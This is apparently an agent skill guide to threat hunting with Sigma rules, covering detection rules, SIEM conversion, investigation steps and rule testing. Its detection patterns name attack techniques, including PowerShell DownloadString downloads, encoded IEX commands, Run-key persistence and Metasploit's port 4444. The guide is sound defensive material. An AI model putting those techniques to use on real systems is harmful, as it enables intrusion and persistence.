Threat Hunting with Sigma Rules
When to Use This Skill
- •Investigating security incidents
- •Creating detection rules for SIEM
- •Analyzing suspicious activity patterns
- •Building threat detection pipelines
- •Converting detections between platforms
Sigma Rule Basics
Rule Structure
yaml
title: Suspicious PowerShell Download
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
status: experimental
description: Detects PowerShell commands downloading files from the internet
author: Security Team
date: 2024/01/15
modified: 2024/01/20
logsource:
category: process_creation
product: windows
detection:
selection_process:
Image|endswith: '\powershell.exe'
selection_commands:
CommandLine|contains|all:
- 'Net.WebClient'
- 'DownloadString'
condition: selection_process and selection_commands
falsepositives:
- Legitimate administrative scripts
- Software installers
level: medium
tags:
- attack.execution
- attack.t1059.001
- attack.defense_evasion
- attack.t1140
Field Modifiers
| Modifier | Description | Example |
|---|---|---|
contains | Substring match | CommandLine|contains: 'wget' |
startswith | Prefix match | Image|startswith: 'C:\Temp' |
endswith | Suffix match | Image|endswith: '.exe' |
re | Regex match | CommandLine|re: '.*base64.*' |
all | All values must match | |contains|all: |
base64 | Base64 decode first | CommandLine|base64|contains: |
cidr | IP range match | DestinationIp|cidr: '10.0.0.0/8' |
Common Detection Patterns
Process Creation
yaml
title: Suspicious Process from Temp Directory
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- '\Temp\'
- '\AppData\Local\Temp\'
Image|endswith:
- '.exe'
- '.com'
- '.scr'
filter_known:
Image|endswith:
- '\setup.exe'
- '\installer.exe'
condition: selection and not filter_known
Network Connections
yaml
title: Outbound Connection to Known Malicious Port
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
DestinationPort:
- 4444 # Metasploit
- 5555 # Common RAT
- 6666 # IRC
- 8080 # Web proxy
condition: selection
File Creation
yaml
title: Executable Created in Suspicious Location
logsource:
category: file_event
product: windows
detection:
selection:
EventType: 'creation'
TargetFilename|endswith:
- '.exe'
- '.dll'
- '.ps1'
TargetFilename|contains:
- '\Windows\Temp\'
- '\ProgramData\'
- '\Users\Public\'
condition: selection
Registry Modifications
yaml
title: Run Key Persistence
logsource:
category: registry_event
product: windows
detection:
selection:
EventType: SetValue
TargetObject|contains:
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
- '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
condition: selection
Hunting Queries
PowerShell Hunting
yaml
# Encoded PowerShell Commands
title: Encoded PowerShell Execution
detection:
selection:
CommandLine|contains:
- '-enc'
- '-EncodedCommand'
- '-e '
CommandLine|base64offset|contains:
- 'IEX'
- 'Invoke-Expression'
condition: selection
Lateral Movement
yaml
# PsExec-like Activity
title: Remote Service Installation
logsource:
product: windows
service: system
detection:
selection:
EventID: 7045 # Service installed
ServiceFileName|contains:
- '\ADMIN$\'
- '\C$\'
condition: selection
Data Exfiltration
yaml
# Large Outbound Transfers
title: Large Data Transfer to External IP
logsource:
category: proxy
detection:
selection:
bytes_out|gt: 10000000 # 10MB
filter_internal:
dst_ip|cidr:
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
condition: selection and not filter_internal
MITRE ATT&CK Mapping
yaml
tags: # Initial Access - attack.initial_access - attack.t1566 # Phishing # Execution - attack.execution - attack.t1059.001 # PowerShell - attack.t1059.003 # Windows Command Shell # Persistence - attack.persistence - attack.t1547.001 # Registry Run Keys # Defense Evasion - attack.defense_evasion - attack.t1140 # Deobfuscate/Decode # Credential Access - attack.credential_access - attack.t1003 # OS Credential Dumping # Lateral Movement - attack.lateral_movement - attack.t1021.002 # SMB/Windows Admin Shares
Converting Sigma Rules
To Splunk
bash
# Using sigmac (legacy) sigmac -t splunk -c sysmon rule.yml # Using sigma-cli sigma convert -t splunk -p sysmon rule.yml
To Elastic
bash
sigma convert -t elasticsearch -p ecs-windows rule.yml
To Microsoft Sentinel
bash
sigma convert -t microsoft365defender rule.yml
Investigation Workflow
1. Triage Alert
markdown
## Alert Triage Checklist - [ ] Verify the detection fired correctly - [ ] Check for false positive indicators - [ ] Identify affected systems - [ ] Determine timeline of activity - [ ] Assess potential impact
2. Gather Context
splunk
# Related process activity index=windows EventCode=1 | where host="affected_host" | where _time >= relative_time(now(), "-1h") | stats count by Image, CommandLine, ParentImage | sort -count # Network connections from host index=network src_ip="10.1.1.50" | where _time >= relative_time(now(), "-1h") | stats count by dest_ip, dest_port | sort -count
3. Timeline Analysis
markdown
| Time | Event | Source | Details | |------|-------|--------|---------| | 10:00 | Phishing email | Email logs | malicious.doc attached | | 10:05 | Document opened | Process logs | WINWORD.EXE spawned | | 10:06 | PowerShell | Process logs | Encoded command | | 10:07 | Network conn | Firewall | C2 callback to 1.2.3.4 | | 10:10 | New service | Event logs | Persistence installed |
4. Containment
bash
# Isolate affected system # Block IOCs at firewall # Disable compromised accounts # Preserve evidence
Rule Testing
python
# Test Sigma rule with pySigma
from sigma.rule import SigmaRule
from sigma.backends.splunk import SplunkBackend
rule = SigmaRule.from_yaml("""
title: Test Rule
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\\cmd.exe'
condition: selection
""")
backend = SplunkBackend()
print(backend.convert_rule(rule))
Best Practices
- • Test rules against known-good baseline
- • Include false positive documentation
- • Map to MITRE ATT&CK techniques
- • Version control all rules
- • Regular rule review and tuning
- • Document investigation runbooks
- • Share rules with community (when appropriate)